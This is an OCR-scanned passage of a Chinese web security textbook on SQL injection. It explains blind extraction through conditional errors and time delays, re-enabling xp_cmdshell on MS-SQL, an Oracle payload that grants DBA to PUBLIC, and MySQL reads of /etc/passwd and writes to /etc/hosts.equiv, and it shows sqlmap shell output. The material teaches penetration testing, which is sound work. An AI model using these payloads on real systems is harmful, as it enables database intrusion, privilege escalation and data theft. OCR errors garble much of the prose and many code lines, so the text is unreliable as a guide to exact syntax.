admin' AND ASCII(SUBSTRING('Admin',1,1)) = 66-- 
提交 大 量 这 类 查询 ， 循 环 每 个 字符 的 所 有 可 能 的 ASCI[ 编 码 ， 直 到 
出 现 一 个 “* 触 点 ”， 就 能 够 以 每 次 一 个 字 节 的 速度 ， 提 取出 整个 字符 串 。 
@ 引发 条 件 性 错误 
在 前 面 的 示例 中 ， 应 用 程序 拥有 一 些 主要 功能 ， 可 以 通过 注入 一 个 





现 有 的 SQL 查询 直接 控制 它们 的 逻辑 。 攻 击 者 能 够 劫持 应 用 程序 计划 执 
行 的 行为 (成 功 或 失败 的 登录 ) 以 获得 想 要 的 信息 。 然 而 ， 并 非 所 有 攻 
击 都 这 样 简单 。 有 时 ， 注 入 的 查询 并 不 会 给 应 用 程序 的 行为 “如 日 志 机 
制 ) 造成 直接 影响 。 或 者 ， 应 用 程序 并 不 处 理 注 入 的 一 个 子 查 询 或 批量 
查询 。 在 这 种 情况 下 ， 攻 击 者 必须 根据 特定 的 条 件 ， 人 争取 在 应 用 程序 中 
造成 可 探测 的 行为 差异 。 

David Litchfield 发 现 了 一 种 技巧 ， 可 在 大 多 数 情况 下 触发 可 探测 的 
行为 差异 。 其 核心 理念 是 注入 一 个 查询 ， 依 照 某 个 特定 的 条 件 引 发 一 个 
数据 库 错误 。 如 果 发 生 数 据 库 错误 ， 可 以 通过 HTTP500 响 应 码 ， 或 者 通 
过 某 种 错误 消息 或 反 名 行为 〈 即 使 错误 消息 本 身 并 未 揭示 任何 有 用 的 信 
息 ) ， 从 外 部 探测 到 这 个 错误 。 

这 种 技巧 利用 了 数据 库 在 求 条 件 语句 的 值 时 表现 出 的 一 个 行为 特 
点 : 数据 库 将 根据 其 他 部 分 的 情况 ， 仅 对 那些 需要 求 值 的 语句 部 分 求 
a T E E 
示例 : 














SELECT X FROM Y WHERE C 


这 条 语句 使 数据 库 访 问 表 Y 的 每 一 行 ， 评 估 条 件 C。 如 果 条 件 C 为 
真 ， 返 回 XX。 如 果 条 件 C 永 为 假 ， 永 远 不 求 出 表达 式 X 的 值 。 

可 以 找到 一 个 语法 有 效 但 如 果 求 值 就 会 生成 错误 的 表达 式 X， 对 这 
种 行为 加 以 利用 。 在 Oracle 与 MS-SQL 中 ， 被 零 除 计算 就 是 这 样 的 表达 
式 ， 如 1/0。 如 果 条 件 C 为 真 ， 那 么 求 表达 式 X 的 值 ， 这 造成 一 个 数据 库 
错误 。 如 果 条 件 C 为 假 ， 就 不 会 发 生 错 误 。 因 此 ， 可 以 通过 是 否 发 生 错 
误 测 试 任意 一 个 条 件 C。 

下 面 的 查询 就 是 一 个 典型 的 示例 ， 它 查询 默认 的 Oracle 用 户 
Fa ee Crane SRR E 
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下 面 的 查询 检查 虚构 用 户 AAAAAA 是 否 存 在 。 因 为 WHERE 条 件 永 
为 假 ， 所 以 不 求 表达 式 1/0 的 值 ， 因 而 不 会 发 生 错误 。 


SELECT 1/0 FROM dual WHERE (SELECT username FROM all_users WHERE username = 


碍 询 不 会 给 应 用 程序 的 逻辑 或 数据 处 理 造成 影响 。 因 此 ， 利 用 它 就 可 以 


使 用 前 面 描述 的 推论 技巧 在 各 种 情况 下 提取 到 所 需要 的 数据 。 而 且 ， 由 
于 这 种 技巧 非 党 简单， 相同 的 攻击 字符 串 可 应 用 于 一 系列 数据 库 ， 其 中 
的 注入 点 则 位 于 各 种 类 型 的 SQL 语句 中 。 

这 种 技巧 的 用 途 非 党 广泛， 因为 它 可 以 用 在 可 以 注入 子 查 询 的 各 种 
注入 点 中 。 例 如 : 


(select 1 where <<condition>> or 1/0=0) 


以 一 个 提供 可 搜索 并 可 排序 的 联系 人 数据 库 的 应 用 程序 为 例 。 用 户 
控制 着 department 和 sort 参 数 : 





/search.jsp?department=30&sort=ename 


以 上 代码 出 现在 以 下 后 端 查询 中 ， 该 查询 确定 了 department 参 数 的 
值 ， 但 将 sort 参 数 连接 到 查询 中 : 

String queryText = “SELECT cname, job,deptno, hiradate FROM emp WEERE deptno = ? 

攻击 者 无 法 修改 WHERE 子 名 或 在 ORDER BY 子 句 后 进行 UNION 查 
询 ， 但 攻击 者 可 以 通过 以 下 语句 建立 菏 种 推 叶 条 件 : 


/searcn.jsprdepartment=20&sort=(select%201/0%20from%20dual%20where%20 


ORDER BY " + Yrequest.cget rameter ( 
i - 


lect %20substr(max{object_name),1,1)%20FROM%20user_objects)=-'Y'} 


如 果 user_objects 表 中 的 第 一 个 对 象 名 称 的 第 一 个 字母 等 于 'Y:， 将 
导致 数据 库 尝试 对 10 求 值 ， 这 会 导致 错误 ， 整 个 查询 不 会 返回 任何 结 
果 。 如 果 第 一 个 字母 不 等 于 "Y'， 原 始 查 询 的 结果 将 按 默认 顺序 返回 。 
通过 对 Absinthe 或 SQLMap 之 类 的 SQL 注入 工具 仔细 设 定 这 个 条 件 ， 我 
们 可 以 检索 数据 库 中 的 每 一 条 记录 。 

@ ”使 用 时 间 延 迟 

尽管 前 面 已 经 描述 了 各 种 复杂 的 技巧 ， 但 是 ， 有 些 时 候 ， 这 些 技巧 
可 能 全 部 无 效 。 有 些 情况 下 ， 可 以 注入 一 个 不 会 在 浏览 句 中 显示 结果 的 
查询 ， 但 由 于 无 法 建立 带 外 通道 ， 即 使 它 在 数据 库 中 引发 错误 ， 也 并 不 
会 给 应 用 程序 的 行为 造成 任何 影 啊 。 

在 这 种 情况 下 ， 笠 亏 NGSSoftware 的 Chris Anley 和 Sherief Hammad 
发 现 了 一 个 技巧 ， 我 们 才 不 至 于 手足 无 措 。 他 们 发 现 一 种 方法 ， 设 计 出 

-个 根据 攻击 者 指定 的 条 件 造成 时 间 延 迟 的 查询 。 攻 击 者 可 以 提交 他 设 
计 的 查询 ， 然 后 监控 服务 器 做 出 啊 应 所 花 的 时 间 。 如 果 发 生 延 人 运 ， 攻 击 
者 可 推断 条 件 为 真 。 即 使 在 两 种 情况 下 应 用 程序 的 响应 完全 相同 ， 攻 击 
者 仍然 可 根据 是 否 存 在 时 间 延 人 运 从 数据 库 中 提取 一 比特 数据 。 通 过 大 量 
执行 这 类 查询， 攻击 者 束 能 够 系统 性 地 从 数据 库 中 提取 任何 复杂 的 数 
































据 ， 每 次 一 比特 。 

引发 适当 时 间 延 迟 方法 的 精确 性 取决 于 所 使 用 的 目标 数据 库 。MS- 
SQL 中 包含 一 个 内 置 WAITFOR 命 令 ， 可 用 于 引起 一 个 指定 的 时 间 延 
迟 。 人 例如， 如果 当前 数据 库 用 户 为 sa， 下 面 的 查询 将 造成 5 秒 钟 的 时 间 
延迟 : 


if (select user) = 'sa' waitfor delay '0:0:5' 


EAI Sa, Bec er athe ws DA PT EE al a TIS 
是 利用 前 面 已 经 描述 的 、 在 应 用 程序 返回 条 件 性 响应 时 用 到 的 相同 技 
巧 。 现 在 ， 如 果 满 足 一 个 特殊 条 件 ， 注 入 的 查询 就 不 再 触及 一 个 不 同 的 
应 用 程序 响应 ， 相 反 ， 它 引发 一 次 时 间 延 人 运 。 例 如 ， 下 面 的 第 二 个 查询 
将 引用 一 次 时 间 延 退 ， 表 示 被 截获 字符 串 的 第 一 个 字母 为 A。 

if ASCIT(SUBSTRING['Admin',1,1)) = 64 waitfor delay '0:0:5' 
if ASCII(SUBSTRING('Admin',1,1}) = 65 waitfor delay '0:0:5' 


和 前 面 一 样 ， 攻击 者 可 以 循环 使 用 每 个 字符 的 所 有 可 能 信 ， 直到 发 
生 时 间 延 人 运 。 男 外 ， 可 以 通过 减少 所 需 请 求 的 数量 ， 提 高 攻击 的 效率 。 
男 一 个 技巧 是 将 每 个 字 节 的 数据 划分 成 比特 ， 并 在 每 次 查询 中 获得 一 比 
特 的 数据 。POWER 命 令 和 按 位 “ 与 ”运算 符 & 可 在 逐 比特 的 基础 上 指定 条 
件 。 例 如 ， 以 下 查询 测试 被 截获 数据 的 第 一 字 节 的 第 一 比特 ， 如 果 其 值 
Al, cn 





























if (ASCIT(SUBSTRING{‘AGmin',1,1}) & (POWER{2,0))) > 0 waitfor delay '0:0:5' 
HAAS HARA 试 : 
if (ASCII(SUBSTRING(‘Admin',1,1)} & {POWER 1))) > 0 waitfor delay '0:0:5 


如 TN eH a 性 在 很 大 程度 上 取决 于 所 
使 用 的 数据 库 。 在 当前 版 本 的 My-SQL 中 ， 睡 眠 函数 可 创建 指定 时 间 的 
时 间 延 人 运 ， 例 如 : 


select if(user() like 'root@%', sleep(5000), 'false') 


在 5.0.12 版 本 之 前 的 MySQL 中 ， 不 能 使 用 睡眠 函数 ， 但 可 以 使 用 基 
MERZ (benchmark function) 重复 执行 一 个 特定 的 操作 。 指 示 数 据 库 执 
行 一 个 处 理 器 密集 型 操作 ， 如 SHA-1 散 列 ， 大 量 的 操作 次 数 将 造成 一 次 
We 例如 : 


select if({user like '‘root@% benchmark (50000,shal{'test')}, fals 


fposgresQL 中 可用 PG SLEEP 函数 ， 
函数 相同 





在 Oracle 中 ， 没 有 产生 时 间 延 迟 的 内 置 方法 ， 一 种 方法 是 使 用 
UTL_HTTP 连 接 一 个 不 存在 的 服务 器 ， 造 成 一 次 操作 超时 。 这 会 使 数据 
pee ee Mee bee 


SELECT ‘a'||Utl_Http. request ('http://madeupserver.cor dual 
aelay...-. 
ORA-29273: HTTP request fallec 
ORA-06512: at "SYS.UTL_ HTTP", Line 1556 
ORA 545: Connect Lled because t host or obje do not exist 


I DI-FFESSCR a BARA HOS} Pa RE HE 例如 ， 如 果 
默认 的 Oracle 账 户 DBSNMP 存 在 ， 下 面 的 查询 将 会 造成 一 次 超时 : 


SELECT ‘a | [ut Http. request ('httpo://madeuvserver.com'} FROM dual WHERE 





(SELECT username PROM 4ll_users WHERE username 'DBSNMP') = 'DBSNM?P' 


如 前 所 述 ， 在 Oracle 和 MySQL 数 据 库 中 ， 都 可 以 使 用 SUBSTR(UING) 
和 ASCII 函 数 每 次 一 字 节 地 获取 任意 信息 。 





VY fem 我 们 已 经 说 明了 如 何 使 用 时 间 延 迟 来 获得 有 用 的 信 
上 县。 然而 ， 当 对 应 用 程序 进行 初步 探查 、 检 测 SQL 注 入 漏洞 时 ， 时 
间 延 迟 技巧 也 可 能 非常 有 用 。 和 
浏览 器 中 不 会 显示 碍 询 结 果 ， 所 有 错误 都 被 应 用 程序 以 隐 含 的 方式 
处 理 ， 使 用 提交 专门 设计 的 输入 的 标准 技巧 可 和 很 难 检测 出 漏洞 。 
这 时 ， 使 用 时 间 延 迟 是 在 初步 探查 过 程 中 检测 一 个 漏洞 是 否 存在 的 
最 有 效 方法 。 例 如 ， 如 果 后 端 数 据 库 为 MS-SQL， 那 么 可 以 将 下 面 
的 两 个 字符 串 轮 流 注 入 每 个 请 求 参 数 中 ， 并 监控 应 用 程序 啊 应 请 求 
所 用 的 时 间 ， 从 而 确定 所 有 漏洞 : 

‘; waitfor delay ‘0:30:0’-- 
1; waitfor delay ‘0:30:0’-- 








尝试 访问 


本 实验 示例 包含 一 个 不 会 返回 任何 错误 反馈 的 SQL 注入 漏洞 ， 
可 使 用 它 练习 各 种 高 级 技巧 ， 包 括 条 件 式 啊 应 和 时 间 延 迟 。 
http://mdsec.net/addressbook/44/ 





成 功利 用 一 个 SQL 注 入 漏洞 往往 可 完全 控制 应 用 程序 的 所 有 数据 。 
大 多 数 应 用 程序 仅 使 用 一 个 账 尸 访问 数据 库 ， 并 且 依赖 应 用 程序 层 控制 
在 不 同 的 用 户 间 实施 访问 隔离。 如 果 能 够 无 限制 地 使 用 应 用 程序 的 数据 
库 账 户 ， 就 可 以 目 由 访问 其 中 的 数据 。 

因此 ， 可 以 假设 ， 拥 有 应 用 程序 的 所 有 数据 是 SQL 注入 攻击 的 最 终 
目的 。 然 而 ， 许 多 原因 表明 ， 利 用 数据 库 中 的 漏洞 ， 或 者 控制 它 的 一 些 
内 置 功 能 以 达到 目的 ， 从 而 进一步 实施 攻击 ， 可 能 会 取得 更 大 的 成 效 。 
通过 扩大 数据 库 攻击 范围 可 实施 的 其 他 攻击 如 下 。 

口 如 果 数 据 库 被 其 他 应 用 程序 共 圣 ， 可 以 通过 提升 数据 库 的 使 用 权 
限 访问 其 他 应 用 程序 的 数据 。 

口 可 以 攻破 数据 库 服务 器 的 操作 系统 。 

口 可 以 访问 其 他 系统 。 通 币 ， 数 据 库 服务 器 是 一 个 在 几 层 网 络 边 界 
防御 保护 下 的 网 络 中 的 主机 。 如 果 能 够 控制 数据 库 服务 器 ， 攻 击 者 束 处 
T a a a a 
以 利用 o 

口 可 以 在 主机 基础 架构 与 自己 的 计算 机 之 间 建 并 网 络 连接 。 这 样 ， 
攻击 者 束 可 以 完全 避 开 应 用 程序 的 防御 ， 轻 易 传 送 从 数据 库 收集 到 的 大 
量 敏感 数据 ， 并 且 可 穿 透 许多 入 侵 检 测 系 统 。 

口 可 以 通过 创建 用 户 定 义 的 功能 任意 扩充 数据 库 的 现 有 功能 。 有 些 
时 候 ， 可 以 通过 这 种 方式 重新 执行 已 被 删 除 或 禁用 的 功能 ， 避 开 数 据 库 
实施 的 强化 保护 措施 。 只 要 已 经 获得 数据 库 管 理 员 (DBA) AIR, MA 
办 法 在 每 种 主流 数据 库 中 执行 这 种 操作 。 








ene ogo See 
需要 通过 验证 才能 加 以 利用 的 攻击 。 他 们 以 为 ， 只 有 相同 组 织 拥有 
的 可 信 应 用 程序 才能 访问 数据 库 ， 这 种 观点 忽略 了 恶意 第 三 方 利用 
应 用 程序 中 存在 的 缺陷 ， 在 应 用 程序 认为 安全 的 背景 下 与 数据 库 交 
互 的 可 能 性 。 刚 刚 描述 的 每 一 种 可 能 的 攻击 证 明 ， 数 据 库 必须 防 衔 
通过 验证 的 攻击 者。 


攻击 数据 库 是 一 个 内 容 广 泛 的 主题 ， 它 不 在 本 书 的 讨论 范围 之 内 。 
本 节 将 分 析 几 种 关键 方法 ， 说 明 如 何 通 过 它们 利用 主要 数据 库 的 漏洞 和 
功能 扩大 攻击 范围 。 我 们 得 出 的 主要 结论 是 : 每 种 数据 库 都 有 提升 权限 
的 可 能 性 。 应 用 当前 发 布 的 安全 补丁 和 可 靠 的 强化 措施 能 够 帮助 避免 许 
多 (但 并 非 全 部 ) 这 种 攻击 。 
1. MS-SQL 

最 常 被 攻击 者 滥用 的 数据 库 功能 可 能 是 xp_cmdshell 存 储 过 程 ， 它 是 
MS-SQL 默 认 内 置 的 一 项 功能 。 这 个 存储 过 程 允许 数据 库 管 理 员 用 户 以 
和 cmd.exe 命 令 提 示 符 相同 的 方式 执行 操作 系统 命令 。 例 如 : 














master..xp_cmdshell ‘ipconfig > foo.txt' 


攻击 者 可 在 众多 情况 下 滥用 这 项 功能 。 他 们 可 以 执行 任意 命令 ， 将 
结果 指 回 本 地 文件 ， 然 后 读 取 文件 内 容 。 他 们 可 以 打开 一 个 连通 自己 计 
算 机 的 带 外 网 络 连接 ， 并 建立 一 条 秘密 的 命令 和 通信 渠道 ， 从 服务 器 复 
制 数据 并 上 传 攻 击 工具 。 由 于 MS-SQL 默 认 以 LocalSystem 运 行 ， 攻 击 者 
一 般 能 够 完全 攻破 基本 的 操作 系统 ， 执 行 任 意 操 作 。MS-SQL 中 还 有 许 
多 其 他 存储 过 程 ， 如 xp_regread 或 xp_regwrite， 也 可 用 于 在 Windows 操 作 
系统 注册 表 中 执行 强大 的 操作 。 

@ 处 理 默 认 锁 定 

互联 网 上 的 大 多 数 MS-SQL 为 MS-SQL 2005 或 更 高 版 本 。 这 些 版 本 
提供 各 种 安全 功能 ， 可 以 在 默认 情况 下 锁定 数据 库 ， 以 防止 各 种 攻击 。 

但 是 ， 如 果 数 据 库 中 的 Web 应 用 程序 用 户 账户 拥有 足够 高 的 权限 ， 
则 通过 重新 设置 数据 库 ， 该 用 户 就 可 以 突破 上 述 功能 实施 的 限制 。 例 
如 ， 可 以 使 用 sp_configure 存 储 过 程 重新 启用 被 禁用 的 xp_cmdshell。 以 
下 4 行 SQL 代 码 用 于 实现 这 一 目的 : 

















EXECUTE sp_configure 'show advanced options', 1 
RECONFIGURE WITH OVERRIDE 

EXECUTE sp_configure 'xp_cmdshell', '‘'1' 
RECONFIGURE WITH OVERRIDE 


这 样 ，xp_cmdshell 就 被 重新 启用 ， 并 可 以 通过 以 下 命令 运行 : 


exec xp_cmdshell 'dir' 


2. Oracle 

人 们 已 在 Oracle 数 据 库 软件 中 发 现 了 大 量 安全 漏洞 。 如 果 找 到 一 个 
允许 执行 任意 查询 的 SQL 注 入 漏洞 ， 那 么 束 可 以 利用 这 种 漏洞 提升 到 数 
据 库 管理 员 权 限 。 

Oracle 包 含 许多 可 在 数据 库 管 理 员 权限 下 运行 的 内 置 的 存储 过 程 ， 
并 已 发 现在 这 些 存储 过 程 中 存在 SQL 注入 漏洞 。 在 2006 年 7 月 发 布 重 要 
补丁 前 ， 存 在 于 默认 包 
SYS.DBMS EXPORT EXTENSION.GET DOMAIN INDEX TABLES 中 
的 缺陷 束 是 一 个 典型 的 示例 。 攻 击 者 可 以 利用 这 个 缺陷 ， 在 易 受 攻击 的 
字段 o DBA to D 来 提升 权限 。 


























select SYS.DBM XPORT EXTE ION.GET_DOMAIN_INDEX_TABLES(' INDX', 'SCH', 
'TEXTINDEXMET! 2DCLlindexUtilCleanup({:pl); execute immediate 
‘declare pragma autcnomeus_transact tion: pegin execute immediate 


**grant dba to cubli "> end: '": END we ,2,'L',0) Erom dual 


这 种 美 型 的 攻击 可 通过 利用 Web 应 用 程序 的 SQL 注入 漏洞 在 易 
受 攻 击 的 参数 中 注入 函数 来 实现 。 

除 这 些 漏洞 外 ，Oracle 还 含有 大 量 默认 功能 ， 这 些 功能 可 被 低 权 限 
用 户 访问 ， 并 可 用 于 执行 各 种 敏感 操作 ， 如 建立 网 络 连接 或 访问 文件 系 
统 。 除 了 前 面 描述 的 用 于 建立 带 外 连接 的 功能 强大 的 包 以 外 ， 
UTL_FILE 包 可 用 于 在 数据 库 服 务 器 文件 系统 上 读 取 和 写 入 文件 。 

2010 年 ，David Litchfield 演 示 了 如 何在 Oracle 10g R2 和 11g 中 利用 
Java 来 执行 操作 系统 命令 。 该 攻击 首先 利用 
DBMS_JVM_EXP_ PERMS.TEMP_JAVA_POLICY 中 的 缺陷 授予 当前 用 
户 java.io. filepermission®X 限 ， 然 后 使 用 DBMS_JAVA.RUNJAVA 执行 运 
行 操作 系统 命令 的 Java 类 hse 例如 : 


DBMS_JAVA,.RUNJAVA( 'oracle/aurora/util/Wrapper c:\\windows\\system32\\ 


exe /Cc 


请 访问 以 下 链 搂 了 解 相关 详情 ， 


口 www.databasesecurity.com/HackingAurora.gdf 

D www.notsosecure.com/folder2/2010/08/02blackhat-2010/ 
3. MySQL 

与 前 面 讨论 的 其 他 数据 库 相 比 ，MySQL 中 包含 的 可 被 攻击 者 滥用 
的 内 置 功 能 相对 较 少 。 其 中 一 个 示例 是 任何 拥有 FILE_PRIV 许 可 的 用 户 
都 可 以 读 取 并 写 入 文件 系统 。 

LOAD_FILE 命 令 可 用 于 获取 任何 文件 的 内 容 。 例 如 : 


select load file('/etc/passwd') 


SELECT ...INTO OUTFILE 命令 可 用 于 将 任何 一 个 查询 的 输出 指向 
一 个 文件 。 例 如 : 


create table test (a varchar (200)) 





insert into test(a) values ('+ +') 
select * from test into outfile '/etc/hosts.equiv' 


除 读 取 并 写 入 关键 的 操作 系统 文件 外 ， 这 些 命 令 还 可 用 于 执行 其 他 


O 因为 MySQL 将 数据 保存 在 明文 文件 中 ， 数 据 库 必须 拥有 读 取 这 些 
文件 的 权限 。 拥 有 FILE_PRIV 许 可 的 攻击 者 可 以 打开 相关 文件 并 读 取 数 
据 库 中 的 任何 数据 ， 避 开 数 据 库 实施 的 任何 访问 控制 。 
口 MySQL 人 允许 用 户 通 过 调用 一 个 包含 函数 执行 过 程 的 编译 库 文件 

(compiled library file) 创建 一 个 用 户 定 义 的 函数 CUDF) 。 这 个 文件 
必须 位 于 MySQL 加 载 动态 库 的 正常 路 径 内 。 攻 击 者 可 以 使 用 前 面 描述 
的 方法 在 这 个 路 径 中 创建 任意 二 进 制 文件 ， 然 后 建立 使 用 这 个 文件 的 
UDF。 请 参阅 Chris Anley 的 论文 “Hackproofing MySQL” 了 解 这 种 技巧 的 
详情 。 


9.2.12 SQL 注入 工具 


我 们 介绍 的 许多 利用 SQL 注入 漏洞 的 攻击 技巧 都 需要 提交 大 量 请 
求 ， 以 逐次 提取 少量 的 数据 。 笠 运 的 是 ， 我 们 可 以 使 用 各 种 工具 来 自动 
8 ne eee 
必定 的 语法 。 

当前 ， 多 数 工 具 通 过 以 下 方法 来 利用 SQL 注入 漏洞 。 

口 对 目标 请 求 中 的 所 有 参数 实施 蛮 力 攻击 ， 以 碍 找 SQL 注 入 点 。 

口 通过 附加 各 种 字符 ， 如 闭 括号 、 注 释 字 符 和 SQL 关键 字 ， 确 定 后 
端 SQL 碍 询 中 易 受 攻击 的 字段 的 位 置 。 





攻击 








口 通 过 蛮 力 猜测 请 求 的 列 数 ， 然 后 确定 包含 varchar 数 据 类 型 的 列 
(可 用 于 返回 结果 ) ， 尝 试 实施 UNION 攻 击 。 

口 注入 定制 查询 来 检索 任意 数据 如 果 需 要 ， 将 多 个 列 中 的 数据 
串 连 成 一 个 字符 串 ， 以 便于 从 单独 一 个 varchar 数 据 类 型 的 结果 中 进行 检 


A、 











口 如 果 无 法 使 用 UNION 检 索 结 果 ， 可 以 在 查询 中 注入 布尔 型 条 件 
CAND 1=1、AND 1=2 等 ) ， 以 确定 是 否 可 以 使 用 条 件 啊 应 来 检索 数 
HF 0 

口 如 果 无 法 通过 注入 条 件 表达 式 来 检索 结果 ， 可 以 尝试 使 用 条 件 时 
间 延 迟 来 检索 数据 。 

这 些 工 具 通 过 在 目标 数据 库 中 查询 相关 元 数据 表 来 查找 数据 。 通 
和 常 ， 它 们 能 够 执行 一 定 程 度 的 权限 提升 ， 如 使 用 xp_cmdshell 获 得 操作 系 
统 级 访问 权限 。 它 们 还 使 用 各 种 优化 技巧 ， 并 利用 各 种 数据 库 中 的 诸多 
功能 和 内 置 函 数 ， 以 减少 基于 推测 的 蛮 力 攻击 所 需 提 交 的 查询 数 ， 避 开 
可 能 对 单 引 号 实施 的 过 滤 ， 等 等 。 
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2 一 ”注解 这 些 工具 是 主要 的 注入 工具 ， 最 适 于 通过 利用 已 确 
定 并 熟悉 的 注入 点 ， 从 数据 库 中 提取 数据 。 但 是 ， 在 查找 并 利用 
SQL 注 入 缺陷 方面 ， 它 们 也 不 是 万 能 的 。 实 际 上 ， 在 通过 这 些 工 具 
注入 数据 之 前 或 之 后 ， 通 常 需 要 提供 其 他 一 些 SQL 语 法 ， 以 确保 这 
些 工具 的 人 硬 编码 攻击 生效 。 


渗透 测试 步 又 


使 用 本 章 前 面部 分 介绍 的 技巧 确定 某 个 SQL 注入 漏洞 后 ， 可 以 
考虑 使 用 SQL 注入 工具 来 利用 该 漏洞 ， 并 从 数据 库 中 检索 有 用 的 数 
SR a 
XX o 

(1) 使 用 拦截 代理 服务 器 运行 SQL 注入 工具 ， 分 析 该 工具 提 
区 的 请 求 以 及 应 用 程序 的 啊 应 。 打 开工 具 上 的 任何 详细 输出 选项 ， 
并 将 它 的 进度 与 观察 到 的 查询 和 响应 关联 起 来 。 

(2) 由 于 这 些 工 具 通 常 依 赖 预先 设置 的 测试 和 特定 的 啊 应 语 
法 ， 因 此 ， 攻 击 者 可 能 需要 将 数据 附加 或 前 置 到 这 些 工 具 注 入 的 字 
符 串 中 ， 以 确保 获得 预期 的 响应 。 典 型 的 要 求 包 括 添加 注释 字符 、 
平衡 服务 器 的 SQL 查询 中 的 单 引 号 ， 以 及 将 财 括号 前 置 或 附加 到 字 
符 串 以 与 原始 查询 匹配 。 

(3) 如 果 尽 管 采 用 了 上 述 方法 ， 但 得 询 语 法 仍然 无 效 ， 这 
时 ， 最 简单 的 方法 是 创建 完全 受 控制 的 舱 套 查询 ， 并 使 用 注入 工具 
注入 该 子 人 查询。 这 样 ， 注 入 工具 就 可 以 通过 推断 来 提取 数据 。 在 注 
入 标准 的 SELECT 和 UPDATE 查 询 时 ， 髓 套 查 询 非常 有 用 。 在 
Oracle 中 ， 册 套 查询 位 于 INSERT 语 句 中 。 下 面 的 示例 前 置 [input] 之 
前 的 文本 ， 并 附加 该 位 置 之 后 的 财 括号 : 

口 Oracle: ’||(select 1 from dual where 1=[input]) 

OY MS-SQL: (select 1 where 1=[input]) 


有 大 量 工具 可 用 于 实施 自动 SQL 注入 攻击 。 其 中 许多 工具 针对 MS- 
SQL， 其 他 一 些 工具 已 停止 开发 ， 并 因为 新 技巧 的 出 现 和 SQL 注入 领域 
的 发 展 而 废弃 。 笔 者 推荐 sqlmap， 该 工具 可 用 于 攻击 MySQL Oracle, 
MS-SQL 及 其 他 数据 库 。 它 执行 基于 UNION 和 推 呆 的 检索 ， 并 且 文 持 各 
种 权限 提升 方法 ， 包 括 从 操作 系统 中 检索 文件 ， 以 及 在 Windows 中 使 用 
xp_cmdshell 执 行 命令 。 

实际 上 ，sqlmap 是 一 种 通过 时 间 延 运 或 其 他 推断 方法 检索 数据 库 信 
晨 的 有 效 工 具 ， 并 且 可 用 于 基于 UNION 的 检索 。 利 用 该 工具 的 最 佳 方 
法 之 一 ， 是 使 用 --sql-shell 选 项 。 这 样 ， 攻 击 者 将 能 够 在 SQL 提示 符 下 于 
后 台 执 行 必 要 的 UNION、 基 于 错误 或 盲目 的 SQL 注 入 ， 以 发 送 和 检索 结 























果 。 例 如 : 


C:\sqlimap>sqlmas.py -u htto://wahh-aop.com/employees?Empno=7369 =--union-use 
--sgql-shell -p Empno 


eqlmap/0.8 - automatic SOL injection and database takeover tool 
http://sqlmap.sourceforge.net 


(*] starting at: 14:54:39 


[14:54:39] [INFO] using 'C:\sqlimap\output \wahh-apo.com\session' 
as session file 
(14:54:39) [INFO] testing connection to the target url 
[14:54:40] [WARNING] the testable parameter 'Smpno' you provided is not 
into the 
Cockie 
[14:54:40] [INFO] testing if the url is stable, wait a few seconds 
[14:54:44] [INFO] url is stable 
[14:54:44] [INFO] testing sql injection on GET parameter 'Empno' with 0 
parenthesis 
[14:54:44] [INFO] testing unescaped numeric injection on GET parameter 
'Empne" 
[14:54:46] [INFO] confirming unescaped numeric injection on GET 
parameter 'Empno' 
[14:54:47] [INFO] GET parameter ‘Empno' is unescaped numeric injectable 
with © 
parenthesis 
[14:54:47] [INFO] testing for parenthesis on injectable parameter 
[14:54:50] [INFO] the injectable parameter requires 0 parenthesis 
[14:54:50] [INFO] testing MySQL 
14:54:51] [WARNING] the back-end DMBS is not MySQL 
[14:54:51] [INFO] testing Oracle 
[14:54:52] [INFO] confirming Oracle 
[14:54:53] [INFO] the back-end DBMS is Oracle 
web server operating system: Windows 2000 
web application technology: ASP, Microsoft IIS 5.0 
back-end DBMS: Oracle 


[14:54:53] [INFO] testing inband sql injection on parameter ‘Empne' with 
NULL 
brutefercing technique 
[14:54:58] [INFO] confirming full inband sql injection on parameter 
! Empric' 
[14:55:00] [INFO] the target url is affected by an exploitable full 


inband 

sql injection vulnerability 
valid union: ‘http: //wahh-app.com: 80/employees.asp?Empno-73269%20 
UNION%20ALL%20SEL 

ECTtZONULLE2CB2 ONULL82C0%2 ONULLBE2CE2 ONULL2 2 OFROMG2 ODUAL--B20ANDE20 


3663=3663' 


14:55:00] INFO] calling Oracle shell. To quit type 1' and 
press ENTER 
sqi-shell> select banner from v$version 
do you want to retrieve the SOL statement output? nl 

14:55:19] [INFO] fetching SOL SELECT st ment tput select banner 

from v$version' 
select banner from v$version [5): 

] DRE $2030 Production 

*] NLUSRTL Version 9.2.90.1.9 Production 

*] Oracledi Enterpr ise Edition Release 9.2.0.1.0 - Producti 

1+] PL/SQL Release 9.2.0.1.6 I 

it Windows: Version 9.2.0.1.0 roaucti 


*] TNS for 32-b:i 


sqi-shell> 





9.2.13 ”SQL 语法 与 错误 参 


我 们 已 经 描述 了 各 种 探查 与 利用 Web 应 用 程序 中 存在 的 SQL 注入 漏 
洞 所 需 的 技巧 。 许 多 时 候 ， 回 不 同 的 后 端 数 据 库 平台 实施 攻击 时 需要 用 
到 的 语法 之 间 存 在 一 些 细 微 的 差别 。 另 外 ， 每 一 种 数据 库 都 生成 不 同 的 
错误 消息 ， 当 探查 各 种 漏洞 以 及 党 试 设 计 一 种 有 效 的 利用 手段 时 ， 需 要 
理解 它们 的 含义 。 下 面 简要 介绍 这 些 语法 和 这 些 语法 的 适用 情况 ， 并 人 解 
释 使 用 过 程 中 出 现 的 一 些 不 常见 的 错误 消 妃 。 

1. SQL 语法 


要 求 ASCII 和 SUBSTRING 
Oracle ”ASCII(A'") 等 于 65 SUBSTR(ABCDE',2,3) 等 于 BCD 

MS-SQL ASCII(A') 等 于 65 SUBSTRING(ABCDE',2,3) 等 于 BCD 
MySQL ASCII(A') 等 于 65 SUBSTRING(ABCDE',2,3) 等 于 BCD 





BE OR 获取 当前 数据 库 用 户 
Oracle Select Sys.login_user from dual 
SELECT user FROM dual 


MS-SQL 
MySQL 


要 求 
Oracle 
MS-SQL 
MySQL 


要 求 
Oracle 
MS-SQL 
MySQL 


要 求 


Oracle 


MS- 
SQL 


MySQL 


要 求 
Oracle 
MS- 
SQL 
MySQL 


SYS_CONTEXT(‘USERENV','SESSION_USER') 
select suser_sname() 
SELECT user() 


5 #2 FY Ti) WEIR 
Utl_Http.request(‘http://madeupserver.com') 
waitfor delay '0:0:10' exec master..xp_cmdshell ‘ping localhost’ 
sleep(100) 


获取 数据 库 版 本 字符 串 
select banner from v$version 
select version 
select version 





获取 当前 数据 库 
SELECT SYS_CONTEXT(USERENV','DB_NAME') FROM 
dual 


select db_name() 





获取 服务 器 名 称 可 使 用 : 
select servername 
